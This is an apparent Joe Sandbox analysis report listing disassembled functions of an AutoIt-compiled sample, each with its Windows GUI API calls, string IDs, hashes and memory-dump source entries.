                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 1038674560-86951937
                                              • Opcode ID: 09587c1d1db511c23000e8aa8ab6af1a4187a1866c7b9b6a037b2fb086871340
                                              • Instruction ID: e4be2d7e57e9fbe91780a8bd294162ec816080e3432789c5375c8a17723cc2a3
                                              • Opcode Fuzzy Hash: 09587c1d1db511c23000e8aa8ab6af1a4187a1866c7b9b6a037b2fb086871340
                                              • Instruction Fuzzy Hash: 918117B0600206AACB25BB60DC82FBE37E8EF15701F4440E5FD15AB1E2EB60DE49D360
                                              Function 00BD9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00BD9AD2
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00BD9B8B
                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00BD9BA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: 0
                                              • API String ID: 2326795674-4108050209
                                              • Opcode ID: 381cc0db43800db27a9fc02bb2285f22694c3abc41f398209b112b942d811c58
                                              • Instruction ID: 14d7617e66eba9640eea0fde3a00c1d0160ffab5a8398251899a9f885d0e23cc
                                              • Opcode Fuzzy Hash: 381cc0db43800db27a9fc02bb2285f22694c3abc41f398209b112b942d811c58
                                              • Instruction Fuzzy Hash: FF02DE30109202AFE725CF14C898BAAFBE5FF49314F0485AEF999D63A1E734D944CB52
                                              Function 00BDA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 00BDA903
                                              • SetTextColor.GDI32(?,?), ref: 00BDA907
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BDA91D
                                              • GetSysColor.USER32(0000000F), ref: 00BDA928
                                              • CreateSolidBrush.GDI32(?), ref: 00BDA92D
                                              • GetSysColor.USER32(00000011), ref: 00BDA945
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BDA953
                                              • SelectObject.GDI32(?,00000000), ref: 00BDA964
                                              • SetBkColor.GDI32(?,00000000), ref: 00BDA96D
                                              • SelectObject.GDI32(?,?), ref: 00BDA97A
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA999
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BDA9B0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00BDA9C5
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BDA9ED
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BDAA14
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00BDAA32
                                              • DrawFocusRect.USER32(?,?), ref: 00BDAA3D
                                              • GetSysColor.USER32(00000011), ref: 00BDAA4B
                                              • SetTextColor.GDI32(?,00000000), ref: 00BDAA53
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BDAA67
                                              • SelectObject.GDI32(?,00BDA5FA), ref: 00BDAA7E
                                              • DeleteObject.GDI32(?), ref: 00BDAA89
                                              • SelectObject.GDI32(?,?), ref: 00BDAA8F
                                              • DeleteObject.GDI32(?), ref: 00BDAA94
                                              • SetTextColor.GDI32(?,?), ref: 00BDAA9A
                                              • SetBkColor.GDI32(?,?), ref: 00BDAAA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              • Opcode ID: a142292cdba9886bd84c8fbb9331dc3666d96c78c85dff52f377bca1d19b158c
                                              • Instruction ID: 44a976ad8fe89096131798a4da00953c13a2e5f5dee8c21ea8983322aab8dd1f
                                              • Opcode Fuzzy Hash: a142292cdba9886bd84c8fbb9331dc3666d96c78c85dff52f377bca1d19b158c
                                              • Instruction Fuzzy Hash: 9D516271905209FFDF109FA4DC48EAEBBB9EF08320F154166F912AB2A1EB759940CF50
                                              Function 00BD89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BD8AC1
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD8AD2
                                              • CharNextW.USER32(0000014E), ref: 00BD8B01
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BD8B42
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BD8B58
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD8B69
                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BD8B86
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00BD8BD8
                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BD8BEE
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD8C1F
                                              • _memset.LIBCMT ref: 00BD8C44
                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BD8C8D
                                              • _memset.LIBCMT ref: 00BD8CEC
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BD8D16
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BD8D6E
                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00BD8E1B
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BD8E3D
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BD8E87
                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BD8EB4
                                              • DrawMenuBar.USER32(?), ref: 00BD8EC3
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00BD8EEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                              • String ID: 0
                                              • API String ID: 1073566785-4108050209
                                              • Opcode ID: 0e9e518fb71f9f2eaaa599a70a0fa9eb547fffad78ddd61a34c748f9766632a1
                                              • Instruction ID: d4e718c8e4e888817265762c4a33794c4ef2f8b9652b7805a936478b4efa176b
                                              • Opcode Fuzzy Hash: 0e9e518fb71f9f2eaaa599a70a0fa9eb547fffad78ddd61a34c748f9766632a1
                                              • Instruction Fuzzy Hash: 0CE16171905209AFDB219F54CC84EEEBBF9EF05711F1481A7F919AB290EB709980DF60
                                              Function 00BD488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00BD49CA
                                              • GetDesktopWindow.USER32 ref: 00BD49DF
                                              • GetWindowRect.USER32(00000000), ref: 00BD49E6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BD4A48
                                              • DestroyWindow.USER32(?), ref: 00BD4A74
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BD4A9D
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD4ABB
                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BD4AE1
                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00BD4AF6
                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BD4B09
                                              • IsWindowVisible.USER32(?), ref: 00BD4B29
                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BD4B44
                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BD4B58
                                              • GetWindowRect.USER32(?,?), ref: 00BD4B70
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00BD4B96
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00BD4BB0
                                              • CopyRect.USER32(?,?), ref: 00BD4BC7
                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00BD4C32
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: a88e865ab056742ad42228cbba01b0928f2b202b3c830c4a1c24666e258004d6
                                              • Instruction ID: 7ae8b76c6124896e1e54e35cab04ad176b86c791ea281a2bc6dd30d803911865
                                              • Opcode Fuzzy Hash: a88e865ab056742ad42228cbba01b0928f2b202b3c830c4a1c24666e258004d6
                                              • Instruction Fuzzy Hash: 82B16C71608341AFDB04DF64C884B6AFBE4FF85314F00899EF9999B291EB71D805CB55
                                              Function 00B527D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528BC
                                              • GetSystemMetrics.USER32(00000007), ref: 00B528C4
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528EF
                                              • GetSystemMetrics.USER32(00000008), ref: 00B528F7
                                              • GetSystemMetrics.USER32(00000004), ref: 00B5291C
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B52939
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B52949
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B5297C
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B52990
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00B529AE
                                              • GetStockObject.GDI32(00000011), ref: 00B529CA
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B529D5
                                                • Part of subcall function 00B52344: GetCursorPos.USER32(?), ref: 00B52357
                                                • Part of subcall function 00B52344: ScreenToClient.USER32(00C157B0,?), ref: 00B52374
                                                • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000001), ref: 00B52399
                                                • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000002), ref: 00B523A7
                                              • SetTimer.USER32(00000000,00000000,00000028,00B51256), ref: 00B529FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: 8fc30edeb294e4d48438fe82663f2ae9c883d9bdafb2101c0791ab6fccf9b0d7
                                              • Instruction ID: 807b9f7c9a2338729aa9c130df3b4d45543dba7fc3d0a42d4a1f8e909117c6d3
                                              • Opcode Fuzzy Hash: 8fc30edeb294e4d48438fe82663f2ae9c883d9bdafb2101c0791ab6fccf9b0d7
                                              • Instruction Fuzzy Hash: 63B16C71A0120ADFDB14EFA8DC95BED7BF4FB49311F1081A9FA16A72A0DB749841CB50
                                              Function 00BB449A Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _wcscat$C1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 2258151342-1459072770
                                              • Opcode ID: c9f2be280c561059120efa154a243dafc4d921b2c019b7c1ba66324e18935bc3
                                              • Instruction ID: 6322ca4e3f171953acfa8d369556025a98217f41446df7c95b11459bbcb71599
                                              • Opcode Fuzzy Hash: c9f2be280c561059120efa154a243dafc4d921b2c019b7c1ba66324e18935bc3
                                              • Instruction Fuzzy Hash: C741E531A042057BDB10AB748C47EFF77FCEF45710F0480EAF919A6192EF759A0196A5
                                              Function 00BAA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00BAA47A
                                              • __swprintf.LIBCMT ref: 00BAA51B
                                              • _wcscmp.LIBCMT ref: 00BAA52E
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00BAA583
                                              • _wcscmp.LIBCMT ref: 00BAA5BF
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00BAA5F6
                                              • GetDlgCtrlID.USER32(?), ref: 00BAA648
                                              • GetWindowRect.USER32(?,?), ref: 00BAA67E
                                              • GetParent.USER32(?), ref: 00BAA69C
                                              • ScreenToClient.USER32(00000000), ref: 00BAA6A3
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00BAA71D
                                              • _wcscmp.LIBCMT ref: 00BAA731
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00BAA757
                                              • _wcscmp.LIBCMT ref: 00BAA76B
                                                • Part of subcall function 00B7362C: _iswctype.LIBCMT ref: 00B73634
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                              • String ID: %s%u
                                              • API String ID: 3744389584-679674701
                                              • Opcode ID: 8556ea27b6be8e7baa8e3578c828b32896fd122f01b3118a8cfcf328520801bf
                                              • Instruction ID: 801f85abfc449bc1c3fe46684ff50a5597f6806648d01d98cd35a45f72c1b10a
                                              • Opcode Fuzzy Hash: 8556ea27b6be8e7baa8e3578c828b32896fd122f01b3118a8cfcf328520801bf
                                              • Instruction Fuzzy Hash: 36A1B171208706AFDB15DF64C884BAAF7E8FF45314F00856AF999D2190DB30ED55CBA2
                                              Function 00BAAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00BAAF18
                                              • _wcscmp.LIBCMT ref: 00BAAF29
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00BAAF51
                                              • CharUpperBuffW.USER32(?,00000000), ref: 00BAAF6E
                                              • _wcscmp.LIBCMT ref: 00BAAF8C
                                              • _wcsstr.LIBCMT ref: 00BAAF9D
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00BAAFD5
                                              • _wcscmp.LIBCMT ref: 00BAAFE5
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00BAB00C
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00BAB055
                                              • _wcscmp.LIBCMT ref: 00BAB065
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00BAB08D
                                              • GetWindowRect.USER32(00000004,?), ref: 00BAB0F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              • API String ID: 1788623398-1539354611
                                              • Opcode ID: b589756a205414cd3329a59d2bf61c7d5ce60b64c9a36a860de4e558d7e0b687
                                              • Instruction ID: 9dccfa126dd549d34dd74e0bbb285fa6f413af5d459801c5fd2202a8b33528f3
                                              • Opcode Fuzzy Hash: b589756a205414cd3329a59d2bf61c7d5ce60b64c9a36a860de4e558d7e0b687
                                              • Instruction Fuzzy Hash: CD81B07110C2069FDB15DF10C881FAABBE8EF45714F0484EAFD999A092EB34DD89CB61
                                              Function 00BAABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                              • API String ID: 1038674560-1810252412
                                              • Opcode ID: 06628e620a855ddb900075977b4ae90630e00d891781f32437ea0d5fbb034ae5
                                              • Instruction ID: ac64a3d0f356a9190a0e4b0efee890ee15e6f65d07596f9b7f0bbc12e1f18b1d
                                              • Opcode Fuzzy Hash: 06628e620a855ddb900075977b4ae90630e00d891781f32437ea0d5fbb034ae5
                                              • Instruction Fuzzy Hash: 8D317231B4C209AADA18FB50DE53FAE77E8DB11B21F2005E9B856710D1FF516F08D662
                                              Function 00BC4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00BC5013
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BC501E
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00BC5029
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00BC5034
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00BC503F
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00BC504A
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00BC5055
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00BC5060
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00BC506B
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00BC5076
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00BC5081
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00BC508C
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00BC5097
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00BC50A2
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00BC50AD
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00BC50B8
                                              • GetCursorInfo.USER32(?), ref: 00BC50C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
